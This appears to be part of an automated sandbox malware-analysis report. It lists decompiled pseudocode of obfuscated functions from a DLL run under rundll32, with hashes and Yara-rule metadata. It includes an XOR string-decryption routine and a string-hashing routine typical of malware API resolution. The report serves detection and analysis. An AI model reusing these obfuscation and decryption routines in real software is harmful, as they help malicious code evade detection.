                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp Download File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 490a59cf89d529a46df9be0ebdbdf52a9a2cfee8a79e3243f32e0f1b5be57fa4
                                                                        • Instruction ID: 3e953d3043e1b2612aa2013cd6f624c31347c1387879b6d22a10554e2811d0ce
                                                                        • Opcode Fuzzy Hash: 490a59cf89d529a46df9be0ebdbdf52a9a2cfee8a79e3243f32e0f1b5be57fa4
                                                                        • Instruction Fuzzy Hash: FAA135B5D00209DBEF18CFA5D98A5EEFBB2FF04348F208119E511BA290D7B95A85CF51
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1001D2CB, Relevance: .1, Instructions: 116COMMONCrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 92%
                                                                        			E1001D2CB(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				void* _t102;
				intOrPtr _t117;
				signed int _t120;
				signed int _t126;
				signed int _t127;
				signed int _t128;
				signed int _t129;
				void* _t130;
				intOrPtr _t132;
				intOrPtr _t145;

				_push(_a8);
				_push(_a4);
				_push(0x10021000);
				_push(__ecx);
				E100056B2(_t102);
				_v8 = 0x5955;
				_t126 = 0x64;
				_v8 = _v8 / _t126;
				_v8 = _v8 >> 5;
				_v8 = _v8 << 0xf;
				_v8 = _v8 ^ 0x0003dad4;
				_v32 = 0x6516;
				_v32 = _v32 + 0xffff2696;
				_v32 = _v32 ^ 0xffff8a6f;
				_v12 = 0xe36b;
				_t127 = 0x33;
				_v12 = _v12 / _t127;
				_v12 = _v12 | 0x8ae53edf;
				_t128 = 0x55;
				_v12 = _v12 * 0x17;
				_v12 = _v12 ^ 0x7a98878f;
				_v24 = 0xe515;
				_v24 = _v24 * 0x63;
				_t129 = 0x24;
				_v24 = _v24 / _t128;
				_v24 = _v24 ^ 0x00017ed2;
				_v20 = 0x2395;
				_v20 = _v20 | 0xb3f3aeab;
				_v20 = _v20 + 0xaf88;
				_v20 = _v20 ^ 0xb3f45cc9;
				_v28 = 0x9af0;
				_v28 = _v28 * 0x39;
				_v28 = _v28 ^ 0xd7063ba5;
				_v28 = _v28 ^ 0xd7241e55;
				_v44 = 0x4d1f;
				_v44 = _v44 >> 2;
				_v44 = _v44 ^ 0x00005248;
				_v40 = 0x8238;
				_t130 = 0x44;
				_v40 = _v40 / _t129;
				_v40 = _v40 ^ 0x00002f18;
				_v36 = 0x2afb;
				_v36 = _v36 ^ 0xf2c87ef6;
				_v36 = _v36 ^ 0xf2c81ca8;
				_v16 = 0xbb48;
				_v16 = _v16 | 0x7786f7dc;
				_v16 = _v16 ^ 0x7786ffdc;
				_t117 = E100157E8(_t130);
				 *0x100221c0 = _t117;
				if(_t117 == 0) {
					L7:
					return 0;
				}
				 *((intOrPtr*)(_t117 + 4)) = 0x10021000;
				 *((intOrPtr*)(_t117 + 0x18)) = 0x10021000;
				_t132 =  *0x100221c0;
				_t145 =  *((intOrPtr*)(_t132 + 4));
				 *(_t132 + 0x40) = _v16;
				_t120 =  *(_t132 + 0x28);
				while( *((intOrPtr*)(_t145 + _t120 * 8)) != 0) {
					_t120 = _t120 + 1;
					 *(_t132 + 0x28) = _t120;
				}
				if(E1001E19F(_v24, _v20, _a8) == 0) {
					E100091CD(_v28, _v44, _v40,  *0x100221c0, _v36);
					goto L7;
				}
				return 1;
			}























                                                                        0x1001d2d2
                                                                        0x1001d2da
                                                                        0x1001d2dd
                                                                        0x1001d2de
                                                                        0x1001d2df
                                                                        0x1001d2e4
                                                                        0x1001d2f2
                                                                        0x1001d2f7
                                                                        0x1001d2fc
                                                                        0x1001d300
                                                                        0x1001d304
                                                                        0x1001d30b
                                                                        0x1001d312
                                                                        0x1001d319
                                                                        0x1001d320
                                                                        0x1001d32a
                                                                        0x1001d32f
                                                                        0x1001d334
                                                                        0x1001d33f
                                                                        0x1001d342
                                                                        0x1001d345
                                                                        0x1001d34c
                                                                        0x1001d357
                                                                        0x1001d35f
                                                                        0x1001d360
                                                                        0x1001d365
                                                                        0x1001d36f
                                                                        0x1001d376
                                                                        0x1001d37d
                                                                        0x1001d384
                                                                        0x1001d38b
                                                                        0x1001d398
                                                                        0x1001d39b
                                                                        0x1001d3a2
                                                                        0x1001d3a9
                                                                        0x1001d3b0
                                                                        0x1001d3b4
                                                                        0x1001d3bb
                                                                        0x1001d3c7
                                                                        0x1001d3c8
                                                                        0x1001d3cb
                                                                        0x1001d3d2
                                                                        0x1001d3d9
                                                                        0x1001d3e0
                                                                        0x1001d3e7
                                                                        0x1001d3ee
                                                                        0x1001d3f5
                                                                        0x1001d402
                                                                        0x1001d407
                                                                        0x1001d40f
                                                                        0x1001d46b
                                                                        0x00000000
                                                                        0x1001d46b
                                                                        0x1001d411
                                                                        0x1001d414
                                                                        0x1001d41a
                                                                        0x1001d420
                                                                        0x1001d423
                                                                        0x1001d426
                                                                        0x1001d42f
                                                                        0x1001d42b
                                                                        0x1001d42c
                                                                        0x1001d42c
                                                                        0x1001d44a
                                                                        0x1001d463
                                                                        0x00000000
                                                                        0x1001d468
                                                                        0x00000000

                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp Download File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 555d0e0e36ac76e63080e4b91e516dd9c6c4ce408a46649481adf2781e1e811b
                                                                        • Instruction ID: 32c1e0764edadb428603f859bd3287ae8af053e8bec179c7a9d038295433632f
                                                                        • Opcode Fuzzy Hash: 555d0e0e36ac76e63080e4b91e516dd9c6c4ce408a46649481adf2781e1e811b
                                                                        • Instruction Fuzzy Hash: 56513675D00209EFDB08DFA4D98A5DEBBF1FB09314F20805AD505BB290D7B59A91CF94
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 100173C0, Relevance: .1, Instructions: 106COMMONCrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 97%
                                                                        			E100173C0(void* __ecx, void* __eflags) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				char _v48;
				signed int _t138;
				signed int _t139;
				signed int _t140;
				void* _t149;
				signed int _t150;
				void* _t153;

				_t153 = __eflags;
				_v24 = 0x158c;
				_v24 = _v24 | 0xc19b8b86;
				_v24 = _v24 + 0xffffcdb5;
				_v24 = _v24 ^ 0xc19b1e12;
				_v8 = 0x1996;
				_v8 = _v8 + 0xffffce0e;
				_t149 = __ecx;
				_v8 = _v8 * 0x33;
				_v8 = _v8 << 2;
				_v8 = _v8 ^ 0xffeca024;
				_v40 = 0x2715;
				_v40 = _v40 << 2;
				_v40 = _v40 ^ 0x0000a273;
				_v12 = 0x2149;
				_v12 = _v12 << 1;
				_v12 = _v12 >> 2;
				_v12 = _v12 ^ 0x1e3791f4;
				_v12 = _v12 ^ 0x1e37d0cb;
				_v28 = 0xe2f1;
				_v28 = _v28 << 3;
				_v28 = _v28 << 2;
				_v28 = _v28 ^ 0x001c0c8b;
				_v36 = 0x4110;
				_v36 = _v36 + 0xffff4283;
				_v36 = _v36 ^ 0xffffc6f6;
				_v20 = 0x5435;
				_v20 = _v20 >> 4;
				_v20 = _v20 << 7;
				_t138 = 0xe;
				_v20 = _v20 / _t138;
				_v20 = _v20 ^ 0x00005afa;
				_v16 = 0x4238;
				_v16 = _v16 + 0xe21;
				_v16 = _v16 ^ 0xb01b9cfe;
				_v16 = _v16 ^ 0x6bc8f8c5;
				_v16 = _v16 ^ 0xdbd331c2;
				_v32 = 0x5416;
				_t139 = 0x7b;
				_v32 = _v32 * 0x2f;
				_v32 = _v32 >> 0x10;
				_v32 = _v32 ^ 0x000053bd;
				_v44 = 0x8a9a;
				_v44 = _v44 / _t139;
				_v44 = _v44 ^ 0x00006f27;
				_v48 = E10017B6B();
				_v8 = 0x4004;
				_v8 = _v8 + 0xffff74e9;
				_v8 = _v8 | 0xacc11b51;
				_t140 = 0x54;
				_push(_t140);
				_v8 = _v8 / _t140;
				_v8 = _v8 ^ 0x030c2ffb;
				_v24 = 0x843c;
				_v24 = _v24 | 0xd1d25750;
				_v24 = _v24 * 0x7a;
				_v24 = _v24 ^ 0xfe7ab108;
				_t150 = E1000607F(_t140, _t153, _t140, _v24, _v8);
				E1000D940(_t149, _v16, _v32, _v44, 3,  &_v48, _t150);
				 *((short*)(_t149 + _t150 * 2)) = 0;
				return 0;
			}




















                                                                        0x100173c0
                                                                        0x100173c6
                                                                        0x100173cf
                                                                        0x100173d6
                                                                        0x100173dd
                                                                        0x100173e4
                                                                        0x100173eb
                                                                        0x100173fa
                                                                        0x100173fc
                                                                        0x100173ff
                                                                        0x10017403
                                                                        0x1001740a
                                                                        0x10017411
                                                                        0x10017415
                                                                        0x1001741c
                                                                        0x10017423
                                                                        0x10017426
                                                                        0x1001742a
                                                                        0x10017431
                                                                        0x10017438
                                                                        0x1001743f
                                                                        0x10017443
                                                                        0x10017447
                                                                        0x1001744e
                                                                        0x10017455
                                                                        0x1001745c
                                                                        0x10017463
                                                                        0x1001746a
                                                                        0x1001746e
                                                                        0x10017475
                                                                        0x1001747a
                                                                        0x1001747f
                                                                        0x10017486
                                                                        0x1001748d
                                                                        0x10017494
                                                                        0x1001749b
                                                                        0x100174a2
                                                                        0x100174a9
                                                                        0x100174b4
                                                                        0x100174b5
                                                                        0x100174b8
                                                                        0x100174bc
                                                                        0x100174c3
                                                                        0x100174cf
                                                                        0x100174d2
                                                                        0x100174e4
                                                                        0x100174e9
                                                                        0x100174f0
                                                                        0x100174f7
                                                                        0x10017503
                                                                        0x10017506
                                                                        0x10017507
                                                                        0x1001750a
                                                                        0x10017511
                                                                        0x10017518
                                                                        0x10017523
                                                                        0x10017526
                                                                        0x10017545
                                                                        0x1001755c
                                                                        0x10017566
                                                                        0x1001756f

                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp Download File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d86156a53a794c3a1ea69ef44ad5d1bbdd6e349abb558353b653a94269d0cae3
                                                                        • Instruction ID: aa47c26f155a7e2cbc498b37881a1f4ddfca2c0909b3e0a1f8a2a5a537750eba
                                                                        • Opcode Fuzzy Hash: d86156a53a794c3a1ea69ef44ad5d1bbdd6e349abb558353b653a94269d0cae3
                                                                        • Instruction Fuzzy Hash: B351D2B1D0120AEBDF48CFA5DA8A8DEBBB1FB48314F208159D112B72A0D3B55B45CF94
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1001BF25, Relevance: .1, Instructions: 99COMMONCrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 92%
                                                                        			E1001BF25(void* __ecx, void* __edx, void* __eflags) {
				void* _t49;
				signed int _t56;
				short* _t72;
				signed int _t73;
				signed int _t75;
				signed int _t76;
				signed int _t77;
				signed int _t84;
				unsigned int _t85;
				unsigned int _t86;
				short* _t93;
				signed int* _t94;
				signed int* _t95;
				signed int* _t96;
				unsigned int _t98;
				void* _t104;
				short _t106;
				void* _t108;
				void* _t109;

				_t96 =  *(_t108 + 0x1c);
				_push(_t96);
				_push( *(_t108 + 0x20));
				_push(__ecx);
				E100056B2(_t49);
				 *(_t108 + 0x1c) = 0x8b96;
				_t94 =  &(_t96[1]);
				 *(_t108 + 0x1c) =  *(_t108 + 0x1c) + 0xffff20a0;
				 *(_t108 + 0x1c) =  *(_t108 + 0x1c) + 0xffff41f6;
				 *(_t108 + 0x1c) =  *(_t108 + 0x1c) << 0xc;
				 *(_t108 + 0x1c) =  *(_t108 + 0x1c) ^ 0xeee2dc93;
				 *(_t108 + 0x30) = 0x710f;
				 *(_t108 + 0x30) =  *(_t108 + 0x30) | 0x6ece5f34;
				_t75 = 0x49;
				 *(_t108 + 0x34) =  *(_t108 + 0x30) / _t75;
				_t76 = 0x78;
				 *(_t108 + 0x30) =  *(_t108 + 0x34) / _t76;
				 *(_t108 + 0x30) =  *(_t108 + 0x30) ^ 0x00037f97;
				_t77 =  *_t96;
				_t95 =  &(_t94[1]);
				_t56 =  *_t94 ^ _t77;
				 *(_t108 + 0x20) = _t77;
				 *(_t108 + 0x24) = _t56;
				_t98 =  !=  ? (_t56 + 0x00000001 & 0xfffffffc) + 4 : _t56 + 1;
				_t109 = _t108 + 0xc;
				_t72 = E100157E8(_t98 + _t98);
				 *((intOrPtr*)(_t109 + 0x24)) = _t72;
				if(_t72 != 0) {
					_t106 = 0;
					_t93 = _t72;
					_t104 =  >  ? 0 :  &(_t95[_t98 >> 2]) - _t95 + 3 >> 2;
					if(_t104 != 0) {
						_t73 =  *(_t109 + 0x14);
						do {
							_t84 =  *_t95;
							_t95 =  &(_t95[1]);
							_t85 = _t84 ^ _t73;
							 *_t93 = _t85 & 0x000000ff;
							_t93 = _t93 + 8;
							 *((short*)(_t93 - 6)) = _t85 >> 0x00000008 & 0x000000ff;
							_t86 = _t85 >> 0x10;
							_t106 = _t106 + 1;
							 *((short*)(_t93 - 4)) = _t86 & 0x000000ff;
							 *((short*)(_t93 - 2)) = _t86 >> 0x00000008 & 0x000000ff;
						} while (_t106 < _t104);
						_t72 =  *((intOrPtr*)(_t109 + 0x24));
					}
					 *((short*)(_t72 +  *(_t109 + 0x18) * 2)) = 0;
				}
				return _t72;
			}






















                                                                        0x1001bf2a
                                                                        0x1001bf2f
                                                                        0x1001bf30
                                                                        0x1001bf35
                                                                        0x1001bf36
                                                                        0x1001bf3b
                                                                        0x1001bf43
                                                                        0x1001bf46
                                                                        0x1001bf50
                                                                        0x1001bf58
                                                                        0x1001bf5d
                                                                        0x1001bf65
                                                                        0x1001bf6d
                                                                        0x1001bf7b
                                                                        0x1001bf80
                                                                        0x1001bf8a
                                                                        0x1001bf8d
                                                                        0x1001bf91
                                                                        0x1001bf99
                                                                        0x1001bf9d
                                                                        0x1001bfa0
                                                                        0x1001bfa2
                                                                        0x1001bfa6
                                                                        0x1001bfba
                                                                        0x1001bfc5
                                                                        0x1001bfd0
                                                                        0x1001bfd2
                                                                        0x1001bfd9
                                                                        0x1001bfe1
                                                                        0x1001bfe3
                                                                        0x1001bff4
                                                                        0x1001bff9
                                                                        0x1001bffb
                                                                        0x1001bfff
                                                                        0x1001bfff
                                                                        0x1001c001
                                                                        0x1001c004
                                                                        0x1001c009
                                                                        0x1001c011
                                                                        0x1001c017
                                                                        0x1001c01b
                                                                        0x1001c024
                                                                        0x1001c025
                                                                        0x1001c02c
                                                                        0x1001c030
                                                                        0x1001c034
                                                                        0x1001c034
                                                                        0x1001c03f
                                                                        0x1001c03f
                                                                        0x1001c04b

                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp Download File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 7e2487da670dfdf4340291a23b1239054837bb09989d1aae364528b122fc451e
                                                                        • Instruction ID: 31a9db1899cf95c0ebf8ee9652300adac22cb49fd3d05de2bcc5fa7de42ab8ee
                                                                        • Opcode Fuzzy Hash: 7e2487da670dfdf4340291a23b1239054837bb09989d1aae364528b122fc451e
                                                                        • Instruction Fuzzy Hash: 6C318C76A183119FD314CF29C88596BF7E1FF88610F414A2EF98597280DB74E909CB92
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1000903F, Relevance: .1, Instructions: 96COMMONCrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 95%
                                                                        			E1000903F(void* __ecx, signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _t136;
				signed int _t137;
				signed int _t138;

				_v56 = _v56 & 0x00000000;
				_v52 = _v52 & 0x00000000;
				_v60 = 0x4b89aa;
				_v24 = 0xd383;
				_v24 = _v24 >> 1;
				_v24 = _v24 + 0xffff6796;
				_v24 = _v24 ^ 0xffff9ecb;
				_v40 = 0x275e;
				_v40 = _v40 >> 0xb;
				_v40 = _v40 ^ 0x00004c05;
				_v36 = 0x2d7f;
				_v36 = _v36 << 0xa;
				_v36 = _v36 ^ 0x00b5d622;
				_v12 = 0x609d;
				_v12 = _v12 * 0x39;
				_t136 = 0x71;
				_v12 = _v12 * 0x6d;
				_v12 = _v12 << 2;
				_v12 = _v12 ^ 0x24a35bb0;
				_v8 = 0x6158;
				_v8 = _v8 ^ 0x69c6b5b2;
				_v8 = _v8 / _t136;
				_v8 = _v8 << 0xa;
				_v8 = _v8 ^ 0xbe8af890;
				_v44 = 0xc5d5;
				_v44 = _v44 | 0xbfd7fc3e;
				_v44 = _v44 ^ 0xbfd7cdf6;
				_v28 = 0x68fd;
				_v28 = _v28 >> 0xd;
				_v28 = _v28 + 0xaf9b;
				_v28 = _v28 ^ 0x0000e0c3;
				_v32 = 0xe5f5;
				_v32 = _v32 ^ 0x15b965a8;
				_v32 = _v32 | 0x20bfb64a;
				_v32 = _v32 ^ 0x35bfa224;
				_v20 = 0x2af5;
				_t137 = 0x36;
				_v20 = _v20 / _t137;
				_v20 = _v20 + 0xffff0be2;
				_v20 = _v20 ^ 0xaeef640c;
				_v20 = _v20 ^ 0x5110195f;
				_v48 = 0xf5d2;
				_t138 = 0x45;
				_push(__ecx);
				_v48 = _v48 / _t138;
				_v48 = _v48 ^ 0x00004994;
				_v16 = 0x4a26;
				_v16 = _v16 + 0xffffa2aa;
				_v16 = _v16 >> 7;
				_v16 = _v16 << 7;
				_v16 = _v16 ^ 0xffff886f;
				_push(_v36);
				 *((intOrPtr*)( *0x100221b8 + 0x2c + __edx * 4)) = E10003708(_v12, _v8, _v44, E1001BF25(_v24, _v40, _v16), _v28);
				return E1001C5F7(_v32, _v20, _v48, _v16, _t117);
			}




















                                                                        0x10009045
                                                                        0x10009049
                                                                        0x1000904d
                                                                        0x10009054
                                                                        0x1000905b
                                                                        0x1000905e
                                                                        0x10009065
                                                                        0x1000906c
                                                                        0x10009073
                                                                        0x10009077
                                                                        0x1000907e
                                                                        0x10009085
                                                                        0x10009089
                                                                        0x10009090
                                                                        0x100090a3
                                                                        0x100090aa
                                                                        0x100090ad
                                                                        0x100090b0
                                                                        0x100090b4
                                                                        0x100090bb
                                                                        0x100090c2
                                                                        0x100090d0
                                                                        0x100090d3
                                                                        0x100090d7
                                                                        0x100090de
                                                                        0x100090e5
                                                                        0x100090ec
                                                                        0x100090f3
                                                                        0x100090fa
                                                                        0x100090fe
                                                                        0x10009105
                                                                        0x1000910c
                                                                        0x10009113
                                                                        0x1000911a
                                                                        0x10009121
                                                                        0x10009128
                                                                        0x10009132
                                                                        0x10009137
                                                                        0x1000913c
                                                                        0x10009143
                                                                        0x1000914a
                                                                        0x10009151
                                                                        0x1000915b
                                                                        0x1000915e
                                                                        0x1000915f
                                                                        0x10009162
                                                                        0x10009169
                                                                        0x10009170
                                                                        0x10009177
                                                                        0x1000917b
                                                                        0x1000917f
                                                                        0x10009186
                                                                        0x100091ae
                                                                        0x100091cc

                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp Download File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: aa57aaca734bfc9d27f03b23d266dafba2ef08ab062a3d772196c9d4fa76611c
                                                                        • Instruction ID: 92030473fc267208a45804a0a9107ff8cc935f9157fe0e4ef1b606325668945c
                                                                        • Opcode Fuzzy Hash: aa57aaca734bfc9d27f03b23d266dafba2ef08ab062a3d772196c9d4fa76611c
                                                                        • Instruction Fuzzy Hash: BE41FEB1D0061DEBDF58CFA5C98A5EEBFB1FB48314F208198D411B62A0D7B91A46CF94
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10008CA3, Relevance: .1, Instructions: 95COMMONCrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 15%
                                                                        			E10008CA3(void* __eflags) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				char _v556;
				void* _t89;
				intOrPtr* _t91;
				signed int _t95;
				signed int _t96;
				signed int _t109;

				_v36 = 0;
				_v32 = 0x29d5;
				_v32 = _v32 ^ 0x626c2200;
				_v32 = _v32 ^ 0x626c072c;
				_v16 = 0x8a53;
				_v16 = _v16 ^ 0xc3c6da5f;
				_v16 = _v16 << 2;
				_v16 = _v16 | 0xabb7532b;
				_v16 = _v16 ^ 0xafbf763a;
				_v20 = 0x925b;
				_t95 = 0x78;
				_v20 = _v20 / _t95;
				_t96 = 0x72;
				_v20 = _v20 / _t96;
				_v20 = _v20 << 0xe;
				_v20 = _v20 ^ 0x0000e1f3;
				_v24 = 0x334;
				_v24 = _v24 + 0x5249;
				_t109 = 0x5c;
				_push(_t96);
				_v24 = _v24 * 0x21;
				_v24 = _v24 ^ 0x000b38a4;
				_v28 = 0x9636;
				_v28 = _v28 >> 3;
				_v28 = _v28 ^ 0x00001dee;
				_v12 = 0xb2e5;
				_v12 = _v12 >> 9;
				_v12 = _v12 ^ 0x878b803c;
				_v12 = _v12 << 4;
				_v12 = _v12 ^ 0x78b81fbb;
				_v8 = 0xb95e;
				_v8 = _v8 >> 7;
				_v8 = _v8 / _t109;
				_v8 = _v8 * 0x1d;
				_v8 = _v8 ^ 0x00001e7b;
				_t89 = E1001372F( &_v556, _v32, _v16);
				_pop(0);
				if(_t89 != 0) {
					_t91 =  &_v556;
					if(_v556 != 0) {
						while( *_t91 != _t109) {
							_t91 = _t91 + 2;
							if( *_t91 != 0) {
								continue;
							} else {
							}
							goto L6;
						}
						 *((short*)(_t91 + 2)) = 0;
					}
					L6:
					_push(0);
					_push(0);
					_push(_v8);
					_push(_v12);
					_push(0);
					_push( &_v556);
					_push( &_v36);
					_push(_v28);
					E1001C50B(_v20, _v24);
				}
				return _v36;
			}

















                                                                        0x10008cb1
                                                                        0x10008cb4
                                                                        0x10008cbb
                                                                        0x10008cc2
                                                                        0x10008cc9
                                                                        0x10008cd0
                                                                        0x10008cd7
                                                                        0x10008cdb
                                                                        0x10008ce2
                                                                        0x10008ce9
                                                                        0x10008cf6
                                                                        0x10008cfb
                                                                        0x10008d03
                                                                        0x10008d08
                                                                        0x10008d0d
                                                                        0x10008d11
                                                                        0x10008d18
                                                                        0x10008d1f
                                                                        0x10008d2a
                                                                        0x10008d2b
                                                                        0x10008d32
                                                                        0x10008d35
                                                                        0x10008d3c
                                                                        0x10008d43
                                                                        0x10008d47
                                                                        0x10008d4e
                                                                        0x10008d55
                                                                        0x10008d59
                                                                        0x10008d60
                                                                        0x10008d64
                                                                        0x10008d6b
                                                                        0x10008d72
                                                                        0x10008d7b
                                                                        0x10008d82
                                                                        0x10008d85
                                                                        0x10008d92
                                                                        0x10008d98
                                                                        0x10008d9b
                                                                        0x10008d9d
                                                                        0x10008daa
                                                                        0x10008dac
                                                                        0x10008db1
                                                                        0x10008db7
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10008db9
                                                                        0x00000000
                                                                        0x10008db7
                                                                        0x10008dbd
                                                                        0x10008dbd
                                                                        0x10008dc1
                                                                        0x10008dc1
                                                                        0x10008dc2
                                                                        0x10008dc3
                                                                        0x10008dcf
                                                                        0x10008dd2
                                                                        0x10008dd3
                                                                        0x10008dd7
                                                                        0x10008dd8
                                                                        0x10008de1
                                                                        0x10008de6
                                                                        0x10008df1

                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp Download File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b6b1417c14184671c41ad61bda5044eabbd7f3f842d6e1b0d6b422026d02d4ca
                                                                        • Instruction ID: e85a7b7b9e80fa5fa2d4e845e599cd15e0f1cf283e3ac7a04302c228e9e6df58
                                                                        • Opcode Fuzzy Hash: b6b1417c14184671c41ad61bda5044eabbd7f3f842d6e1b0d6b422026d02d4ca
                                                                        • Instruction Fuzzy Hash: 50413471D01219EBEF08CFA1D98A9EEBBB4FB44344F20819AD011A7290E7B45B84CF90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1000492A, Relevance: .1, Instructions: 81COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp Download File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 961fd7a361e0172d8f30d972625903cf08f1595dadf935efa2e92da8d0bc0e0d
                                                                        • Instruction ID: b77e1522f9f411a300076352412bb0455ec5798372a08adffc7e0fc2ea0eca11
                                                                        • Opcode Fuzzy Hash: 961fd7a361e0172d8f30d972625903cf08f1595dadf935efa2e92da8d0bc0e0d
                                                                        • Instruction Fuzzy Hash: B9311372D0020DBFDF05CF95CC4A8EEBBB5FB48358F508158F91866260D3B69A659B90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1001C424, Relevance: .1, Instructions: 67COMMONCrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 93%
                                                                        			E1001C424(signed short* __edx, intOrPtr _a4) {
				signed int _v4;
				signed int _v8;
				void* _t48;
				signed int _t55;
				signed int _t57;
				signed int _t60;
				signed int _t67;
				signed int _t70;
				signed short* _t72;

				_push(_a4);
				_t72 = __edx;
				_push(__edx);
				E100056B2(_t48);
				_v8 = 0xd4f3;
				_t60 = 0x53;
				_v8 = _v8 / _t60;
				_v8 = _v8 ^ 0x00000290;
				_v4 = 0x6d95;
				_v4 = _v4 >> 5;
				_v4 = _v4 >> 5;
				_v4 = _v4 ^ 0x0000001d;
				_v4 = 0xb2ff;
				_v4 = _v4 * 0x7b;
				_v4 = _v4 ^ 0x00560095;
				if( *((intOrPtr*)(__edx)) != 0) {
					do {
						_t57 = _v8;
						_v4 = 0x6d95;
						_v4 = _v4 >> 5;
						_v4 = _v4 >> 5;
						_v4 = _v4 ^ 0x0000001d;
						_v4 = 0xb2ff;
						_t67 = _v8 << _v4;
						_v4 = _v4 * 0x7b;
						_v4 = _v4 ^ 0x00560095;
						_t55 =  *_t72 & 0x0000ffff;
						_t70 = _v8 << _v4;
						if(_t55 >= 0x41 && _t55 <= 0x5a) {
							_t55 = _t55 + 0x20;
						}
						_v8 = _t55;
						_t72 =  &(_t72[1]);
						_v8 = _v8 + _t67;
						_v8 = _v8 + _t70;
						_v8 = _v8 - _t57;
					} while ( *_t72 != 0);
				}
				return _v8;
			}












                                                                        0x1001c428
                                                                        0x1001c42c
                                                                        0x1001c42e
                                                                        0x1001c430
                                                                        0x1001c435
                                                                        0x1001c44a
